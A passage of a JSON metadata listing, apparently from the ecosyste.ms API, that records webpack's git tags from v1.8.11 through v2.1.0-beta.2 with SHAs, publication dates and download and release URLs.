nd":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecos